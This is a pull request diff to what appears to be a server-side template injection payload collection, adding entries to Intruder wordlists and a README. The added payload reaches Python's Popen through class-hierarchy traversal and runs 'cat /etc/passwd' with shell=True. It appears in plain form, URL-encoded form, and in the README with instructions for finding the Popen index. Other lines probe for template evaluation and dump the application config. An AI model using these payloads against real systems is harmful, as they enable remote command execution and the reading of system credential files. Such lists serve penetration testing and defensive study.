Merge pull request #8 from AyhamAl-Ali/master

🚀 Add new payload

Intruder/ssti-payloads.txt

@@ -14,6 +14,7 @@ ${{3*3}}
 {{ [].class.base.subclasses() }}
 {{''.class.mro()[1].subclasses()}}
 {{ ''.__class__.__mro__[2].__subclasses__() }}
+{{''.__class__.__base__.__subclasses__()[227]('cat /etc/passwd', shell=True, stdout=-1).communicate()}}
 {% for key, value in config.iteritems() %}<dt>{{ key|e }}</dt><dd>{{ value|e }}</dd>{% endfor %}
 {{'a'.toUpperCase()}} 
 {{ request }}

Intruder/ssti-urlencoded-payloads.txt

@@ -13,6 +13,7 @@
 %7B%7B%20%5B%5D.class.base.subclasses%28%29%20%7D%7D%0A
 %7B%7B%27%27.class.mro%28%29%5B1%5D.subclasses%28%29%7D%7D%0A
 %7B%7B%20%27%27.__class__.__mro__%5B2%5D.__subclasses__%28%29%20%7D%7D%0A
+%7B%7B%27%27%2E%5F%5Fclass%5F%5F%2E%5F%5Fbase%5F%5F%2E%5F%5Fsubclasses%5F%5F%28%29%5B227%5D%28%27cat%20%2Fetc%2Fpasswd%27%2C%20shell%3DTrue%2C%20stdout%3D%2D1%29%2Ecommunicate%28%29%7D%7D
 %7B%25%20for%20key%2C%20value%20in%20config.iteritems%28%29%20%25%7D%3Cdt%3E%7B%7B%20key%7Ce%20%7D%7D%3C/dt%3E%3Cdd%3E%7B%7B%20value%7Ce%20%7D%7D%3C/dd%3E%7B%25%20endfor%20%25%7D%0A
 %7B%7B%27a%27.toUpperCase%28%29%7D%7D%20%0A
 %7B%7B%20request%20%7D%7D%0A

README.md

@@ -17,7 +17,7 @@ Even in cases where full remote code execution is not possible, an attacker can
 
 #### Payloads :
 
-```
+```py
 {{2*2}}[[3*3]]
 {{3*3}}
 {{3*'3'}}
@@ -33,6 +33,8 @@ ${{3*3}}
 {{ [].class.base.subclasses() }}
 {{''.class.mro()[1].subclasses()}}
 {{ ''.__class__.__mro__[2].__subclasses__() }}
+{{''.__class__.__base__.__subclasses__()}} # Search for Popen process, use payload below change 227 to index of Popen
+{{''.__class__.__base__.__subclasses__()[227]('cat /etc/passwd', shell=True, stdout=-1).communicate()}}
 {% for key, value in config.iteritems() %}<dt>{{ key|e }}</dt><dd>{{ value|e }}</dd>{% endfor %}
 {{'a'.toUpperCase()}} 
 {{ request }}